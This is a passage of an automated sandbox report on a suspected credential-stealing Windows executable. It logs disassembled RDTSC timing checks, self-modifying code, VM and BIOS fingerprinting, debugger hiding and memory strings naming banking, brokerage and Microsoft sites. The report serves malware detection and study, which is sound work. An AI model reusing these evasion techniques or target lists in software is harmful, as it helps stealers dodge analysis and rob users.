    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5460386 second address: 54603E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0BACBDA1A1h 0x00000009 or ax, 2F06h 0x0000000e jmp 00007F0BACBDA1A1h 0x00000013 popfd 0x00000014 mov eax, 6810F2B7h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c jg 00007F0C1DE68268h 0x00000022 jmp 00007F0BACBDA19Ah 0x00000027 js 00007F0BACBDA1F1h 0x0000002d jmp 00007F0BACBDA1A0h 0x00000032 cmp dword ptr [ebp-14h], edi 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 54603E9 second address: 5460406 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5460406 second address: 546043C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 mov si, F56Fh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jne 00007F0C1DE6821Eh 0x00000013 jmp 00007F0BACBDA1A2h 0x00000018 mov ebx, dword ptr [ebp+08h] 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F0BACBDA19Ah 0x00000024 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 546043C second address: 5460440 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5460440 second address: 5460446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5460446 second address: 54604F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0BACBDA3DCh 0x00000009 and esi, 271347F8h 0x0000000f jmp 00007F0BACBDA3DBh 0x00000014 popfd 0x00000015 movzx esi, dx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b lea eax, dword ptr [ebp-2Ch] 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F0BACBDA3E1h 0x00000025 and ecx, 24A51C96h 0x0000002b jmp 00007F0BACBDA3E1h 0x00000030 popfd 0x00000031 mov dh, ch 0x00000033 popad 0x00000034 push ebx 0x00000035 jmp 00007F0BACBDA3E8h 0x0000003a mov dword ptr [esp], esi 0x0000003d pushad 0x0000003e mov cx, B53Dh 0x00000042 pushfd 0x00000043 jmp 00007F0BACBDA3DAh 0x00000048 or ah, 00000018h 0x0000004b jmp 00007F0BACBDA3DBh 0x00000050 popfd 0x00000051 popad 0x00000052 nop 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 jmp 00007F0BACBDA3E0h 0x0000005c rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 54604F0 second address: 54604F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 54604F4 second address: 54604FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 54604FA second address: 546050B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0BACBDA19Dh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 546050B second address: 5460530 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F0BACBDA3DCh 0x0000000e nop 0x0000000f pushad 0x00000010 mov esi, 23DD096Dh 0x00000015 mov ah, CFh 0x00000017 popad 0x00000018 push eax 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5460530 second address: 5460534 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5460534 second address: 5460551 instructions: 0x00000000 rdtsc 0x00000002 call 00007F0BACBDA3DCh 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov bh, 83h 0x0000000c popad 0x0000000d mov dword ptr [esp], ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5460551 second address: 5460557 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 546059F second address: 54605CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 6F7788D4h 0x00000008 mov al, bl 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov esi, eax 0x0000000f pushad 0x00000010 mov ah, 36h 0x00000012 movsx edi, ax 0x00000015 popad 0x00000016 test esi, esi 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F0BACBDA3E0h 0x00000021 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 54605CB second address: 54605CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 54605CF second address: 54605D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 54605D5 second address: 5450C92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA19Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F0C1DE68204h 0x0000000f xor eax, eax 0x00000011 jmp 00007F0BACBB38CAh 0x00000016 pop esi 0x00000017 pop edi 0x00000018 pop ebx 0x00000019 leave 0x0000001a retn 0004h 0x0000001d nop 0x0000001e xor ebx, ebx 0x00000020 cmp eax, 00000000h 0x00000023 je 00007F0BACBDA333h 0x00000029 call 00007F0BB135CB05h 0x0000002e mov edi, edi 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007F0BACBDA1A3h 0x00000037 add esi, 0FEDBCBEh 0x0000003d jmp 00007F0BACBDA1A9h 0x00000042 popfd 0x00000043 popad 0x00000044 xchg eax, ebp 0x00000045 pushad 0x00000046 mov di, ax 0x00000049 pushad 0x0000004a pushfd 0x0000004b jmp 00007F0BACBDA1A6h 0x00000050 add ch, FFFFFFE8h 0x00000053 jmp 00007F0BACBDA19Bh 0x00000058 popfd 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5450C92 second address: 5450CAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F0BACBDA3DFh 0x0000000c xchg eax, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5450CAF second address: 5450CB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5450CB3 second address: 5450CB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5450CB7 second address: 5450CBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5450CBD second address: 5450CC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5450CC3 second address: 5450CC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5450CC7 second address: 5450D0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F0BACBDA3E0h 0x00000012 xchg eax, ecx 0x00000013 jmp 00007F0BACBDA3E0h 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5450D0B second address: 5450D11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5450D11 second address: 5450D27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0BACBDA3E2h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5460996 second address: 546099A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 546099A second address: 54609DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F0BACBDA3E6h 0x0000000c add eax, 36A31D78h 0x00000012 jmp 00007F0BACBDA3DBh 0x00000017 popfd 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d call 00007F0BACBDA3DBh 0x00000022 pop esi 0x00000023 popad 0x00000024 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5460AB5 second address: 5460AB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5460AB9 second address: 5460ABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5460ABF second address: 5460B04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA19Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007F0C1DE5F237h 0x0000000e push 766E2B70h 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov eax, dword ptr [esp+10h] 0x0000001e mov dword ptr [esp+10h], ebp 0x00000022 lea ebp, dword ptr [esp+10h] 0x00000026 sub esp, eax 0x00000028 push ebx 0x00000029 push esi 0x0000002a push edi 0x0000002b mov eax, dword ptr [76744538h] 0x00000030 xor dword ptr [ebp-04h], eax 0x00000033 xor eax, ebp 0x00000035 push eax 0x00000036 mov dword ptr [ebp-18h], esp 0x00000039 push dword ptr [ebp-08h] 0x0000003c mov eax, dword ptr [ebp-04h] 0x0000003f mov dword ptr [ebp-04h], FFFFFFFEh 0x00000046 mov dword ptr [ebp-08h], eax 0x00000049 lea eax, dword ptr [ebp-10h] 0x0000004c mov dword ptr fs:[00000000h], eax 0x00000052 ret 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 mov bl, 40h 0x00000058 pushfd 0x00000059 jmp 00007F0BACBDA1A6h 0x0000005e and ax, 3078h 0x00000063 jmp 00007F0BACBDA19Bh 0x00000068 popfd 0x00000069 popad 0x0000006a rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5460B83 second address: 5460B87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5460B87 second address: 5460B8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5460B8D second address: 5460BC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0BACBDA3DCh 0x00000008 call 00007F0BACBDA3E2h 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 cmp dword ptr [ebp+08h], 00002000h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F0BACBDA3DCh 0x0000001f rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470B22 second address: 5470B28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470B28 second address: 5470B2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470B2C second address: 5470B9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov cx, 2139h 0x0000000e mov di, si 0x00000011 popad 0x00000012 mov dword ptr [esp], ebp 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F0BACBDA19Eh 0x0000001c adc eax, 69912348h 0x00000022 jmp 00007F0BACBDA19Bh 0x00000027 popfd 0x00000028 pushfd 0x00000029 jmp 00007F0BACBDA1A8h 0x0000002e jmp 00007F0BACBDA1A5h 0x00000033 popfd 0x00000034 popad 0x00000035 mov ebp, esp 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a movsx edi, si 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470B9D second address: 5470BA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470BA2 second address: 5470C19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 mov bx, 2020h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ebx 0x0000000e jmp 00007F0BACBDA1A4h 0x00000013 mov dword ptr [esp], esi 0x00000016 pushad 0x00000017 mov cx, 01BDh 0x0000001b popad 0x0000001c mov esi, dword ptr [ebp+0Ch] 0x0000001f jmp 00007F0BACBDA1A4h 0x00000024 test esi, esi 0x00000026 jmp 00007F0BACBDA1A0h 0x0000002b je 00007F0C1DE47957h 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 mov al, dh 0x00000036 call 00007F0BACBDA1A6h 0x0000003b pop eax 0x0000003c popad 0x0000003d rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470C19 second address: 5470C1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470C1F second address: 5470C23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470CEF second address: 5470CFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470CFE second address: 5470D04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470D04 second address: 5470D08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470D08 second address: 5470D17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470D17 second address: 5470D1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470D1B second address: 5470D21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470D21 second address: 5470D46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0BACBDA3E0h 0x00000009 or al, FFFFFFF8h 0x0000000c jmp 00007F0BACBDA3DBh 0x00000011 popfd 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470D81 second address: 5470D87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470D87 second address: 5470D8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeSpecial instruction interceptor: First address: CF5ECE instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeSpecial instruction interceptor: First address: CF5F22 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeSpecial instruction interceptor: First address: E95C27 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeSpecial instruction interceptor: First address: F19434 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe TID: 3520Thread sleep time: -38019s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe TID: 4552Thread sleep time: -210000s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
    Source: Qyk8RJnGN7.exe, 00000000.00000002.1228878328.0000000000E6F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
    Source: Qyk8RJnGN7.exe, Qyk8RJnGN7.exe, 00000000.00000002.1229503900.0000000001467000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.984015002.00000000014A7000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.924032519.00000000014A7000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.980354207.00000000014A7000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.973978536.00000000014A7000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.973120667.00000000014A7000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000002.1229655461.00000000014A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DFB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696492231p
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
    Source: Qyk8RJnGN7.exe, 00000000.00000002.1228878328.0000000000E6F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeSystem information queried: ModuleInformationJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeProcess information queried: ProcessInformationJump to behavior

    Anti Debugging

    barindex
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeThread information set: HideFromDebuggerJump to behavior
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeOpen window title or class name: regmonclass
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeOpen window title or class name: gbdyllo
